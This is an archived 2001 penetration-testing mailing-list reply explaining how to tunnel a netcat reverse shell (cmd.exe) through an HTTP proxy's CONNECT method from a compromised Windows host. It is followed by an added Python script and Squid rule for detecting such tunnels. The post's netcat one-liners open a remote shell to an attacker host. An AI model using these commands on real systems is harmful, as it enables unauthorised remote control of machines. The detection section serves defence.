Penetration Testing mailing list archives
Re: Reverse Http Shell Solution
From: "Jody Melbourne" <jody.melbourne () itacsecurity com>
Date: Fri, 19 Oct 2001 12:30:36 +1000
Hi,
> Does anybody know any solution based on the remote shell in Win32 machines using Reverse Telnet thru Proxies? The proxy only permits HTTP 80/8080.
I think your situation is this: You have owned a machine which is behind a firewall, and it only allows connections out via a proxy, so simple reverse telnet techniques such as 'nc.exe -e cmd.exe myip myport' fail. You could try something like this:

Attacker: netcat -v -l -p 80
Victim: echo CONNECT attacker:80 HTTP/1.1 | netcat proxyserver 8080 -e cmd.exe

The HTTP/1.1 CONNECT method is the only way I can see you getting a nice interactive command prompt if ports 80/8080 outbound are all you have to play with.

Remember that netcat can bind in FRONT of the existing IIS process. If you spawn a netcat listener on 80, 443, 21, etc. with the '-l' (listen once) option, the next person to connect to that port will get the netcat listener. Any subsequent connections will see the IIS service.

cheers
.jm
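From the defender's side, the tunnel described in the message above appears in the proxy's log as a CONNECT to a port other than 443. The following is an added example, not part of the original post: it scans Squid native-format access log lines for such requests. The log lines, addresses and the 443-only policy are constructed assumptions.

```python
import re
from collections import defaultdict

# Policy assumption for this example: CONNECT is only expected to TLS port 443.
ALLOWED_CONNECT_PORTS = {443}

# Leading fields of Squid's native access.log format:
# time elapsed client code/status bytes method URL ...
LINE_RE = re.compile(
    r"^(?P<ts>\d+\.\d+)\s+(?P<elapsed>\d+)\s+(?P<client>\S+)\s+"
    r"(?P<code>[A-Z_]+)/(?P<status>\d{3})\s+(?P<bytes>\d+)\s+"
    r"(?P<method>[A-Z]+)\s+(?P<url>\S+)"
)

def parse_connect_target(authority):
    """Split 'host:port' or '[v6]:port' into (host, port); None if malformed."""
    host, sep, port = authority.rpartition(":")
    if not sep or not host or not port.isdigit():
        return None
    return host.strip("[]"), int(port)

def suspicious_connects(lines, allowed=ALLOWED_CONNECT_PORTS):
    """Map client -> [(host, port, status, elapsed_ms)] for CONNECTs outside policy."""
    hits = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m["method"] != "CONNECT":
            continue
        target = parse_connect_target(m["url"])
        # A malformed authority is reported too, with port None.
        host, port = target if target else (m["url"], None)
        if port not in allowed:
            hits[m["client"]].append((host, port, int(m["status"]), int(m["elapsed"])))
    return dict(hits)

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    "1003458636.101   1520 10.0.0.15 TCP_TUNNEL/200 4821 CONNECT www.example.com:443 - HIER_DIRECT/192.0.2.10 -",
    "1003458640.552 912345 10.0.0.23 TCP_TUNNEL/200 88213 CONNECT 203.0.113.7:80 - HIER_DIRECT/203.0.113.7 -",
    "1003458641.007     35 10.0.0.15 TCP_MISS/200 1432 GET http://www.example.com/ - HIER_DIRECT/192.0.2.10 text/html",
    "1003458700.310      0 10.0.0.23 TCP_DENIED/403 3911 CONNECT 203.0.113.7:8080 - HIER_NONE/- text/html",
]

if __name__ == "__main__":
    for client, events in suspicious_connects(SAMPLE_LOG).items():
        for host, port, status, elapsed in events:
            print(f"{client} CONNECT {host}:{port} status={status} elapsed_ms={elapsed}")
```

The matching control at the proxy is to refuse CONNECT to anything but TLS ports; Squid's stock configuration does this with `http_access deny CONNECT !SSL_ports`.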